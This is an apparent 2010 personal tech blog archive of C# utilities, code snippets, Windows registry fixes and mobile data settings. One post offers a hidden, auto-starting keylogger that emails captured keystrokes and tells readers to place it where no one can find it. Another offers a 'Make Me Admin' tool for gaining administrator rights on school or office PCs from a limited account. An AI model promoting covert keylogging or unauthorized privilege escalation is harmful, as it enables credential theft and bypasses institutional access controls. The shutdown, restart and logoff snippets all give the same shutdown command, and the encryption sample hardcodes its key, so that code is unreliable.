Sunday, March 28, 2010

Personal KeyLogger

1:59 PM
11

NOTE :-  This article and software is for personal use only ! Please do not use it for information stealing or for hacking activities.
Hellooooo everyone I'm back with another cool software. I know that many of us wants to monitor user activities in our system, means what's going on in our system while we are away from it. There are many softwares available on internet but many of them are Shareware or infected with virus...........
As you all know that I'm a C# addict n I love to create small applications in C# language, I developed a small application which can monitor the KeyStrokes of any active system.
This is like a small keyLogger which can help you to monitor the Time , Application and KeyStrokes pressed while the user works on a particular application ........
It's small but really powerful and user friendly

Main Features :-
  • User Friendly Interface
  • Password Protection
  • Email Reports Function
  • Runs Automatically on System Startup
  • Running in Hidden Mode
  • Unique HotKey - Ctrl+K
  • Portable - Means no installation needed
  • Last but not least it's freeware
PREREQUISITE : -
Just copy the application to a location where no one can find it (eg. C:\Windows) and run it
Then it will automatically hide itself and running in background.
To get the interface on screen just press the hotKey i.e, Ctrl+K and enter the default password which is 1234 (you can change it any time)
Enjoy guys and let me know is it working fine or not !
Please be sure that you have installed dotnet framework 2.0 if not already in your system (No need for Windows Vista and Windows7 users as dotnet framework runtime already included in windows...)


DOWNLOAD sys activity.rar APPLICATION(Extract it using winrar)

DOWNLOAD DOTNET FRAMEWORK 2.0 RUNTIME (prerequisite)

I'll soon make it run without dotnet framework

Cheers..............

Sunday, March 21, 2010

(Specially for NIIT students)
Many of us trying to get the admin powers in school , college or in office pcs, but for this we have to login with admin power !
What can we do if we have a limited power account and want to have admin powers...................
Don't worry I got a solution for that and make a small application in C# language................

All you have to do is - Run the application >>> Click on MAKE ME ADMIN button and that's it !
You are done............. After that when a user (with admin powers) login to that computer will automatically gives admin powers to your limited user account.................
100% working...................

DOWNLOAD MAKE ME ADMIN
(Dotnet Framework 2.0 needed to run this application)

Thursday, March 18, 2010

SDMS Project for students.........
A simple and attractive School management system project created in c# with sql2005 as backend database with all the source code.

Don't forget to fire sql queries before running the main application !
sql queries are also included in sourceProject !
Download sourceProject VS2008
Download sample exe application

Enjoy.................

Many applications in any language needs basic shutdown, restart, logoff functionality in it. I have also created some applications which needs shutdown or restart or logoff commands in C# programming language, but it tooks a long time to find a small code to do the trick !

So now I'm providing the smallest code to perform these system operations to save your precious time :-

To Shutdown - System.Diagnostics.Process.Start("Shutdown", "/s /t 30");

To Restart - System.Diagnostics.Process.Start("Shutdown", "/s /t 30");

To Logoff - System.Diagnostics.Process.Start("Shutdown", "/s /t 30");

In the above three code snips 30 is the time in seconds, you can increase and decrease it according to your application !

Enjoy !

Download Demo Application
Download DemoScr VS2008 project

Tuesday, March 16, 2010

ReadyBoost - Using Your USB Key to Speed Up Windows 7


One very cool feature of Windows 7 – especially for machines not natively equipped with the kind of horsepower to fully enjoy the rich visuals of Windows Presentation Foundation (Avalon) applications is ReadyBoost. ReadyBoost enables you to plug a USB key into your machine and have Windows 7 use it as memory. I actually used this myself, and had heard of it yesterday. When a reader emailed me asking if this was an urban legend, I decided to check it out for myself and was very impressed with how easy and seamless the process is.

Installing/Configuring the USB Mass Storage as Memory(RAM)

First I took a standard USB 2.0 key (I’ll list the prerequisites shortly) and plugged it into my machine. I’m running Windows 7 Ultimate. Upon plugging the USB key into my computer, I was greeted with the standard "AutoPlay" dialog box asking how I wanted to the operating system to treat the USB key. 

>First Of All Format The Pendrive with exFAT or NTFS Option

 

>Now Go to My Computer ,right click on the USB Drive or SD (secure digital) memory card and select Properties
>Then select ReadyBoost & Click on Use this device 
>Then increase the "Space to reserve for system speed"
>Now click on Apply and then OK,


That's It !
Enjoy the new high speed of your
System ...

Things to Know About ReadyBoost :-

If you have a USB key configured to use ReadyBoost and then insert a second key, Windows 7 will display the Properties dialog box where you’ll see the message on the Memory tab .    
While ReadyBoost will work with other devices – such as SD Card, CompactFlash, etc. – I’ve only used it with a USB key and here are the baseline requirements the team gave me regarding what ReadyBoost will work with: 


  • The USB Key must be at least USB 2.0
  • The USB Key has to have at least 64mb of free space 

Update: Due to so many questions about this feature, I've tracked down the Program Manager (owner) of this feature - Matt Ayers. Matt has put together a complete ReadyBoost FAQ for everyone that I've posted in a separate blog entry. Therefore, feel free to make comments here.

Sunday, March 14, 2010

LOVE METER

11:27 PM
1

Cricket

11:00 PM
0

CHESS

10:24 PM
0

Please wait it will take some time to load .................

00">

TIC - TAC - TOE

10:12 PM
0

Arrange Numbers

10:09 PM
0

Yohoho Cannon

8:58 PM
0

Bombardment

8:50 PM
0

Hey everyone I'm using windows 7 and I like its feature of changing the desktop wallpaper automatically.
That's why I created this small application to change your desktop wallpaper according to your choice automatically at specific time intervals!

Hope you all like it ! 
Its very user friendly .............................

Download AutowallpaperChanger

Thursday, March 11, 2010

EXE - DLL MERGER

2:42 PM
5

A small application to merge several exe and dll files (dotnet) into a single exe application !
In this application I used ILMerge to complete the merge operation !



Download Merger.rar(contains two files ILMerge.exe and Merger.exe)

Just download and extract the files using winrar and run the Merger.exe Application !

Note : Both the ILMerge.exe and Merger.exe Files Must be in a single folder .

Enjoy !
Please leave comments...........

Wednesday, March 10, 2010

A small application to hide n protect your private folders !

User friendly interface
You can password protect it

Download Folder Hider

Download Dotnet framework 2.0(needed if not installed in your system)

A Small animated fish for your desktop !


Download Animated Fish

Download Dotnet Framework 2.0

A Small application which can easly block n unblock websites easly !




You can even password protect it !

Download Websites Blocker (Proxy)

Dotnet Framework 2.0 Needed

Now a days because of viruses many of us facing the problem of Disabled Registry or Disabled Task Manager or Disabled Folder Options and many more..........
That's why to solve these problems I created a small application - Registry Tweaks

Features : -

  • Disable - Enable Task Manager
  • Easy To Use User Interface
  • Disable - Enable Registry
  • Disable - Enable Folder Options
  • Disable - Enable USB
  • Prevent User From Changing Desktop Wallpaper
  • Show Hidden Files Directly (Without using Folder Options)

Download Registry Tweaks

Dotnet Framework 2.0 Needed To Run This Application

Tuesday, March 9, 2010

We use the " using System.Security.Cryptography and using System.IO " namespaces to encrypt n decrypt string.


First of all add the above two namespaces to your project .
Now take a globle static string variable : private static string sKey = "123abc456efg"; //it can b any string value just use any of your choice

The following is a method to encrypt the string :

protected static string Encrypt(string InputText, string key)
{
// "key" string variable is nothing but the key(your secret key) value which is sent from the front end.
// "InputText" string variable is the actual password sent from the login page.
// We are now going to create an instance of the
// Rihndael class.
RijndaelManaged RijndaelCipher = new RijndaelManaged();
// First we need to turn the input strings into a byte array.
byte[] PlainText = System.Text.Encoding.Unicode.GetBytes(InputText);
// We are using Salt to make it harder to guess our key
// using a dictionary attack.
byte[] Salt = Encoding.ASCII.GetBytes(key.Length.ToString());
// The (Secret Key) will be generated from the specified
// key and Salt.
//PasswordDeriveBytes -- It Derives a key from a password
PasswordDeriveBytes SecretKey = new PasswordDeriveBytes(key, Salt);
// Create a encryptor from the existing SecretKey bytes.
// We use 32 bytes for the secret key
// (the default Rijndael key length is 256 bit = 32 bytes) and
// then 16 bytes for the IV (initialization vector),
// (the default Rijndael IV length is 128 bit = 16 bytes)
ICryptoTransform Encryptor = RijndaelCipher.CreateEncryptor(SecretKey.GetBytes(16), SecretKey.GetBytes(16));
// Create a MemoryStream that is going to hold the encrypted bytes
MemoryStream memoryStream = new MemoryStream();
// Create a CryptoStream through which we are going to be processing our data.
// CryptoStreamMode.Write means that we are going to be writing data
// to the stream and the output will be written in the MemoryStream
// we have provided. (always use write mode for encryption)
CryptoStream cryptoStream = new CryptoStream(memoryStream, Encryptor, CryptoStreamMode.Write);
// Start the encryption process.
cryptoStream.Write(PlainText, 0, PlainText.Length);
// Finish encrypting.
cryptoStream.FlushFinalBlock();
// Convert our encrypted data from a memoryStream into a byte array.
byte[] CipherBytes = memoryStream.ToArray();
// Close both streams.
memoryStream.Close();
cryptoStream.Close();
// Convert encrypted data into a base64-encoded string.
// A common mistake would be to use an Encoding class for that.
// It does not work, because not all byte values can be
// represented by characters. We are going to be using Base64 encoding
// That is designed exactly for what we are trying to do.
string EncryptedData = Convert.ToBase64String(CipherBytes);
// Return encrypted string.
return EncryptedData;
}

The Following Method Is To Decrypt The String :
 
protected static string Decrypt(string InputText, string key)
{
try
{
RijndaelManaged RijndaelCipher = new RijndaelManaged();
byte[] EncryptedData = Convert.FromBase64String(InputText);
byte[] Salt = Encoding.ASCII.GetBytes(key.Length.ToString());
PasswordDeriveBytes SecretKey = new PasswordDeriveBytes(key, Salt);
// Create a decryptor from the existing SecretKey bytes.
ICryptoTransform Decryptor = RijndaelCipher.CreateDecryptor(SecretKey.GetBytes(16), SecretKey.GetBytes(16));
MemoryStream memoryStream = new MemoryStream(EncryptedData);
// Create a CryptoStream. (always use Read mode for decryption).
CryptoStream cryptoStream = new CryptoStream(memoryStream, Decryptor, CryptoStreamMode.Read);
// Since at this point we don't know what the size of decrypted data
// will be, allocate the buffer long enough to hold EncryptedData;
// DecryptedData is never longer than EncryptedData.
byte[] PlainText = new byte[EncryptedData.Length];
// Start decrypting.
int DecryptedCount = cryptoStream.Read(PlainText, 0, PlainText.Length);
memoryStream.Close();
cryptoStream.Close();
// Convert decrypted data into a string.
string DecryptedData = Encoding.Unicode.GetString(PlainText, 0, DecryptedCount);
// Return decrypted string.
return DecryptedData;
}
catch (Exception exception)
{return (exception.Message);
}}
 
 
Thas it !
 
Download Demo Application

Download Demo SrcCode VS2008

Monday, March 8, 2010

Airtel has recently rolled out a new GPRS pack which is very competitive with GPRS packs offered by new providers like Docomo. With new plan user gets unlimited browsing all through the month for just Rs.98. Though Airtel calls it “unlimited”, it comes with fair usage policy limit of 2Gb. If you are using GPRS only on mobile device, 2Gb is more than enough for a month. If you are connecting your laptop or PC to browse internet, then you should be counting on those bits!

To get this plan, just “Easy Recharge” with Rs.98. But, before that activate Mobile Office on your number. To do that dial *567*11# & you will get a confirmation message. Dialing this activates basic plan of Mobile Office, which is 30paise/50kb, pay as you browse. After you ERecharge with Rs.98, it overrides the basic plan & you will get 2Gb of free browsing. It’s instant
If you don’t have settings send ALL to 543210

To check your usage details & expiry date of the pack dial *123*10#


I provide these settings becasuse in ChinaMobile customer care doesn't provide any Settings through SMS...
The only way is manually settings and the function of ChinaMobile is also very Complicated sooo....Here is the Mobile Office, Airtel Live and Airtel MMS settings for ALL CHINA Mobiles ==>

1) Mobile Office


first click SERVICES icon in main menu==>DATA ACCOUNT==>GPRS==>EDIT any existing account==>
Account Name--> MO
APN-->airtelgprs.com
Auth. Type-->Normal



save all the settings.

Come back to SERVICES==>WAP==>SETTINGS==>EDIT PROFILE==>EDIT any existing account==>
Rename Profile==> Mobile Office
Homepage==>Google
data account==> MO (which we created previously)
Connection Type==>

Here u find three option
a) Connection-oriented
b) Connectionless
c) HTTP

choose a) Connection-oriented==>
IP Address==>202.056.231.117
Security==> off
Again save all the settings and click BACK button and choose "Activate Profile"
Come back to SERVICES==>WAP==>Homepage

and you r ready to use Mobile Office...

2) Airtel Live
first click SERVICES icon in main menu==>DATA ACCOUNT==>GPRS==>EDIT any existing account==>
Account Name--> LIVE
APN-->airtelfun.com
Auth. Type-->Normal
save all the settings.

Come back to SERVICES==>WAP==>SETTINGS==>EDIT PROFILE==>EDIT any existing account==>
Rename Profile==> Airtel Live
Homepage==>http://live.airtelworld.com
data account==> LIVE (which we created previously)
Connection Type==>

Here u find three option
a) Connection-oriented
b) Connectionless
c) HTTP
choose c) HTTP==>
Proxy Address==>100.001.200.099
Proxy Port==> 8080
Again save all the settings and click BACK button and choose "Activate Profile"
Come back to SERVICES==>WAP==>Homepage
and you r ready to use Airtel Live...


3) Airtel MMS

first click SERVICES icon in main menu==>DATA ACCOUNT==>GPRS==>EDIT any existing account==>
Account Name--> MMS
APN-->airtelmms.com
Auth. Type-->Normal
save all the settings.
Come back to SERVICES==>WAP==>SETTINGS==>EDIT PROFILE==>EDIT any existing account==>
Rename Profile==> Airtel MMS
Homepage==>http://100.1.201.171:10021/mmsc
data account==> MMS (which we created previously)
Connection Type==>
Here u find three option
a) Connection-oriented

b) Connectionless
c) HTTP
choose c) HTTP==>
Proxy Address==>100.1.201.172
Proxy Port==>8799
Again save all the settings and click BACK button and choose "Activate Profile"
Come back to SERVICES==>WAP==>Homepage
and you r ready to use Airtel MMS...
Enjoy....

Download China PC Suite

Download China Phone Modem Drivers

How To Use : -
Step 1 : First of all download the above two files and extract them using winrar !
Step 2 : Now connect your china phone to your pc or laptop and select the COM PORT option in your phone !
Step 3 : Now the system  begin to search for the drivers
Step 4 : Click next and select the Drivers Folder (which you already dowloaded ) and click next again then your system will install the drivers for your phone !
Step 5 : Now Goto > Start > Run      , and type devmgmt.msc and press ENTER to open device manager and in Ports list note down your phone's port number




Step 6 : Now open the China Pc Suite Folder (which you already downloaded from above link) and run the PhoneSuite.exe application !
Step 7 : Click on Settings in connect > Mobile Phone : Select Your phone (if there) and COM Ports : Here select the port which you have noted in Step5 .

Step 8 :  This step is for creating internet connection through china phone > Click on Create Connection > Click on New / Modify button and enter details as shown in following pic :
then click on New button . Now select the aircel gprs (just for example) from Operators list and click on Create Button and you will see a message like following :

Click OK That's it !
You have successfully created a dialup connection using china phone !

Step 9 : To Connect to internet >Goto >Start > Run , and type npca.cpl to open current connection and select the connection you have created in Step8 >Hit Enter >Click On Dial
That's it !
If you have activated ineternet on your mobile , you will be connected to ineternet !
Cheers ...................      :-)

Sunday, March 7, 2010

According to the MSDN Library, “the animate window function enables you to produce special effects when showing or hiding windows”. There are only four types of animation that you can use. They are: roll, slide, collapse/expand, and alpha-blended fade.




In order to call the AnimateWindow function, as already stated, we need to use PInvoke. This is the PInvoke signature for the AnimateWindow function (the using System.Runtime.InteropServices; declaration is required):

[DllImport("user32.dll")]
static extern bool AnimateWindow(IntPtr hWnd, int time, AnimateWindowFlags flags);



Add this to the top of the “Form1” class.



Notice the “AnimateWindowFlags” parameter. This is a user-defined type. So, in order for this code to compile, you must add this enum to your code:



[Flags]
enum AnimateWindowFlags


{


AW_HOR_POSITIVE = 0x00000001,


AW_HOR_NEGATIVE = 0x00000002,


AW_VER_POSITIVE = 0x00000004,


AW_VER_NEGATIVE = 0x00000008,


AW_CENTER = 0x00000010,


AW_HIDE = 0x00010000,


AW_ACTIVATE = 0x00020000,


AW_SLIDE = 0x00040000,


AW_BLEND = 0x00080000


}


These are the possible animation types that you can use. Below is a brief overview of what each flag does.



AW_SLIDE :

Uses slide animation. By default, roll animation is used. This flag is ignored when used with AW_CENTER.

AW_ACTIVATE :

Activates the window. Do not use this value with AW_HIDE.

AW_BLEND :

Uses a fade effect. This flag can be used only if hwnd is a top-level window.

AW_HIDE :

Hides the window. By default, the window is shown.

AW_CENTER :

Makes the window appear to collapse inward if AW_HIDE is used or expand outward if the AW_HIDE is not used. The various direction flags have no effect.

AW_HOR_POSITIVE :

Animates the window from left to right. This flag can be used with roll or slide animation. It is ignored when used with AW_CENTER or AW_BLEND.

AW_HOR_NEGATIVE :

Animates the window from right to left. This flag can be used with roll or slide animation. It is ignored when used with AW_CENTER or AW_BLEND.

AW_VER_POSITIVE :

Animates the window from top to bottom. This flag can be used with roll or slide animation. It is ignored when used with AW_CENTER or AW_BLEND.

AW_VER_NEGATIVE :

Animates the window from bottom to top. This flag can be used with roll or slide animation. It is ignored when used with AW_CENTER or AW_BLEND.

Animating a Window

Now that we have the AnimateWindow function setup, let’s animate a window.

First, we need to create a load event handler for our form.

Inside of the form’s load event handler, add this code:

AnimateWindow(this.Handle, 500, AnimateWindowFlags.AW_BLEND);

Build and run your code. When your application starts, you should see the form fade in. Go ahead and mess around with the “time” parameter and the “AnimateWindowFlags” parameter. Remember that the higher the value you set the time, the slower the animation will take place.



Download Demo Application
Download Src Code VS2008

That’s it!
Enjoy !

First of all include using System.Drawing.Imaging; namespace in your project.
The Following method will return a bitmap image of the active desktop !

public Bitmap ScreenShot()
{
Bitmap screenShotBMP;
screenShotBMP = null;
screenShotBMP = new Bitmap(Screen.PrimaryScreen.Bounds.Width,
Screen.PrimaryScreen.Bounds.Height, PixelFormat.Format32bppArgb);
Graphics screenShotGraphics = Graphics.FromImage(screenShotBMP);
screenShotGraphics.CopyFromScreen(Screen.PrimaryScreen.Bounds.X,
Screen.PrimaryScreen.Bounds.Y, 0, 0, Screen.PrimaryScreen.Bounds.Size,
CopyPixelOperation.SourceCopy);
return screenShotBMP;
}
 


Download Demo Application

Download VS2008 Project Scr Code

That's It !
Enjoy !

If search opens when you double click on folder in windows explorer, then see the fix below:

We need to repair some registry entry damaged by virus corresponding to windows shell. Follow the steps below:

1. Open Start >> Run or press Window Key + r , this will open the run prompt.

2. Type “regedit” ( without quotes ) and press Enter.

3. Navigate to key

HKEY_CLASSES_ROOT\Directory\shell

4. Double the registry key named Default and set the value to none.

This will restore the normal windows explorer behavior of opening a folder when you double click a folder rather than opening windows search.

If search opens when you double click on any windows drive, then try this

1. Open Start >> Run or press Window key + r

2. Type “regsvr32 /i shell32.dll” ( without quotes ) and press Enter

After the command run successfully, you will see a message saying DllRegisterServer and DllInstall in Shell32.dll succeeded.

We hope this will help to fix the trouble.

Follow the steps :

CTRL + ALT + DEL

Start Task manager

Applications tab
New task
type explorer & press ENTER

have they now returned?

Do they disappear the next time you reboot? If so, explorer.exe is missing

from the shell string under Winlogin registry key



START
RUN
Type regedit & press ENTER



Navigate to:



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon



in the right pane is the shell string I mentioned above. It should read like

this:



Shell REG_SZ explorer.exe



Close the registry editor



In short, the proposed action plan that worked for him and seems to be

working for me follows. Jay



I read many posts related to the topic and eventually did the following:



1. booted up to windows

2. ctrl+alt+del to get windows task manager

3. File, new task, typed regedit, clicked ok

4. go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Current

Version\Image File Execution Options\

5. In there I had an explorer.exe folder that I deleted (you may have an

entry in the root of the Image File folder as well.. delete them also).

6. Rebooted and everything was back to normal.

7. Breathed a sigh of relief.



You can back up the explorer.exe folder (and files in the Image File

Execution Options root if applicable) by exporting them before the deletion

process.



Hopefully this thread will save many people lots of time in the future.

This is a very common problem faced by many of us using Windows that many times, and unknowingly why, our CPU usage shoots up to 100% and a process named Explorer.exe starts consuming a lot of resources and memory.

This makes our system very slow to respond and takes lot of time to execute an application.

The problem has no definite fox but here is a list of steps that you can try to solve the problem.

Steps:

1. First of all ensure that your system is virus and malware free. Use a good and updated Anti Virus along with the Malware Expert Mbam.

2. This problem has also been found to be caused due to the broken Avi files and missing codecs. So go to registry editor (type regedit in Run) and remove the following key

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}\InProcServer32

Also change the value of default in the key HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler from “87D62D94-71B3-4b9a-9489-5FE6850DC73E” to 0.

3. We need to make some changes in explorer itself. Go to Folder Options -> View tab and make sure that the option “Automatically search for network folders and printers” is unchecked and the option “Launch folder windows in a separate process” is checked. Apply.

4. Re-registering the Winzip also fixes this problem sometime. Type regsvr32 C:\windows\system32\zipfldr.dll /u in the run box.

Reboot may be required.

Hacker tools are programs written to access a computer system using known software vulnerability. Most of these programs have been written and are freely distributed from “Hacker” websites. Some of these programs were written for legitimate uses and are abused as a hacking tool.




======================================================================
Key Loggers, like the name suggests, are programs that record keystrokes from the computer keyboard and either logs it to the computer or sends it to its maker through a built in e-mail engine. Key logging allows a prospective hacker to gain access to the user name, passwords, and even id numbers entered into sensitive online bank accounts or passwords to remote control programs. Listed below are the top 9 key loggers reported.


======================================================================
RATs are remote administration programs that have been embedded into an unsuspecting victim's computer. This is the most dangerous of all hacking tools as it allows complete and total control of the infected computer.


======================================================================
Spyware as the name suggests is software that is embedded on a computer and records passwords, Internet visits, cookies and can sometimes control computers services and remotely execute commands. Spyware is becoming more popular as husbands and wife’s become more concerned with their spouses Internet activity. There are many computer programs offered on the Internet for free that have hidden Trojans with spyware embedded in them. Remember, nothing is really as free as it may seem, there is always a hidden price. Listed below are 10 of the most common Spyware programs:


======================================================================
Cookies store information about websites that a person has visited, sometimes with a username and password. Most sophisticated computer users have their Internet browser configured not to allow cookies on their computer, but some software demands it and they will give up security for convenience. List below are ten Cookie Spyware programs.


======================================================================
All Trojans are hidden programs that are disguised within another program. This is the largest example of “Freeware” software that has another agenda. It should be stated that most “Freeware” is perfectly legitimate and is contributed freely by the author with good intentions. However, there are still other “Freeware” in the mix that is distributed intentionally and unintentionally for the sole purpose of gaining access to your computer system. Sadly, paranoia is the safest bet if you want to keep out unwanted intruders. Unfortunately, this isn’t always effective when there are programs that enter on their own. Below are 10 of the most common Trojan programs of 2003


======================================================================
Many worms use Microsoft Outlook or Outlook Express to propagate. These types of e-mail "Worms" have an attached file that has to be clicked open to be installed. These types of worms typically have a file with a double extension, such as (NAME.BMP.EXE or NAME.TXT.VBS). These extensions are Windows executable files that install a program on your computer. These programs can be Remote control programs, Spyware, Keyloggers or any software used maliciously by a dark hacker. Additional extensions are VBS, SHS, BAT, EXE, CMD and PIF.

Other "Worms" take advantage of buffer overflows and other program vulnerabilities.

======================================================================

Buffer Overflow Explained

Buffer Overflows happen when more data is put into a buffer or holding area, then the buffer can handle. This is due to a mismatch in processing rates between the producing and consuming processes. This can result in system crashes or the creation of a back door leading to system access.

======================================================================

1. Click Start, and then click Run.


2. In the Open box, type regedit, and then click OK.

3. Locate, and then click the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor

4. In the right pane, double-click Start.

5. In the Value data box, type 4, click Hexadecimal (if it is not already

selected), and then click OK.

6. Quit Registry Editor.

7. Restart Windows.
If this method doesn't work for you, you can try going into device manager and under USB controllers you can try disabling them from there.

If neither of those methods work then go into your computer BIOS and disable the USB ports.

Useful Windows XP Tips, Tweaks, Walkthroughs and Shortcuts.


1. Total Uptime

It boasts how long it can stay up. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad.

2. Delete Files Immediately

You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish.

3. Lock XP

You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. Remove System Software

XP hides some system software you might want to remove, such as Windows Messenger, but you can make it show everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be the software and you can now uninstall it.

5. Interesting New Commands

For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options.

6. IP Version 6 Support

XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry.

7. Task Termination

You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. ZIP Files as Folders

XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can change things back by typing 'regsvr32 zipfldr.dll'.

9. XP Has ClearType

XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. Remote Assistance:

You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your friend's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. User Task Management

You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Disable Default Notifications

Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might go insane before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. Faster Startup

You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Delete Temp Internet Files Automatically

Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. Network Activity Light

XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. Speed-Up Your Start Menu

The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. Batch Rename Files

You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Album Cover Arts

Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Handy Shortcut Keys

Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. Windows File Protection

Windows XP secretly knows that the average user has no idea what they are doing. Therefore, it doesn't let you do really stupid things like deleting the windows directory (at least not without spending several hours convincing it that you really want to do this).

If you enjoyed it, please drop a word of appreciation. Thanks

IF YOU RUN WINDOWS THEN YOU MUST HAVE SEEN THIS PROCESS RUNNING IN THE BACKGROUND. THIS IS A VERY COMMON PROCESS AND APPEARS EACH TIME YOU TRY TO REMOVE FROM THE STARTUP LIST.




CTFMON.EXE IS A COMMON AND USEFUL PROCESS RELATED TO THE MICROSOFT OFFICE SUITE. IT DOES THE IMPORTANT WORK OF CONTROLLING THE ALTERNATIVE USER INPUT AND THE MICROSOFT OFFICE XP LANGUAGE BAR. IT COMES HANDY WHEN WE TRY TO CONTROL THE COMPUTER THROUGH SPEECH OR WHEN USING THE ONSCREEN KEYBOARD.

THE PROCESS IS IMPORTANT TO THE PEOPLE USING THESE FEATURES BUT OTHERS CAN CONSIDER DISABLING CTFMON.EXE.



STEPS TO DISABLE CTFMON.EXE

IN WINDOWS

• GO TO CONTROL PANEL AND CHOOSE REGIONAL AND LANGUAGE OPTIONS.

• CLICK ON DETAILS UNDER TEXT SERVICE AND INPUT LANGUAGE SECTION.

• GO TO ADVANCED TAB AND CLICK THE BOX THAT READS “TURN OFF ADVANCED TEXT SERVICES”.



YOU MAY ALSO NEED TO REMOVE SOME ADDITIONAL FEATURES LIKE THIS ONE SHOWN BELOW.



REMOVE FROM STARTUP

• TYPE MSCONFIG IN THE RUN BOX AND JUST UNCHECK THE CTFMON OPTION FROM THE STARTUP TAB.

• REBOOT THE COMPUTER.

THE PROCESS WOULD HAVE BEEN DISABLED NOW.

WHAT IS CSRSS.EXE?

3:11 PM
1

IF YOU HAVE BEEN WONDERING WHAT PROCESS CSRSS.EXE IS AND WHY IT IS RUNNING, THEN HERE ARE THE DETAILS.








CSRSS.EXE IS A PROCESS USED BY THE MICROSOFT CLIENT SERVER RUNTIME SERVER SUBSYSTEM AND HENCE IS THE PROCESS NAME CSRSS.EXE. THE PROCESS IS USED FOR MANAGING THE MAJORITY OF THE GRAPHICAL INSTRUCTION.



WHY IS IT NECESSARY?



CSRSS.EXE IS NECESSARY FOR THE PROPER FUNCTIONING OF THE WINDOWS AND ITS TERMINATION CAN RESULT IN BLUE SCREEN OF DEATH. ON THE OTHER HAND IN NOTEBOOKS AND LAPTOPS, THE PROCESS CSRSS.EXE HANDLES THE POWER MANAGEMENT SCHEMES.



ADDITIONAL INFO



CSRSS.EXE IS ALSO REGISTERED AS A TROJAN AND IF YOUR SYSTEM HAS MORE THAN ONE OCCURRENCE OF THE PROCESS, THEN THIS PROCESS SHOULD BE TREATED AS SUSPICIOUS.



IF CSRSS.EXE USES 100% OF THE CPU WHEN YOU RIGHT-CLICK AN ITEM IN WINDOWS EXPLORER OR ON THE DESKTOP THEN IT IS SURE THAT YOUR USER PROFILE IS CORRUPT.

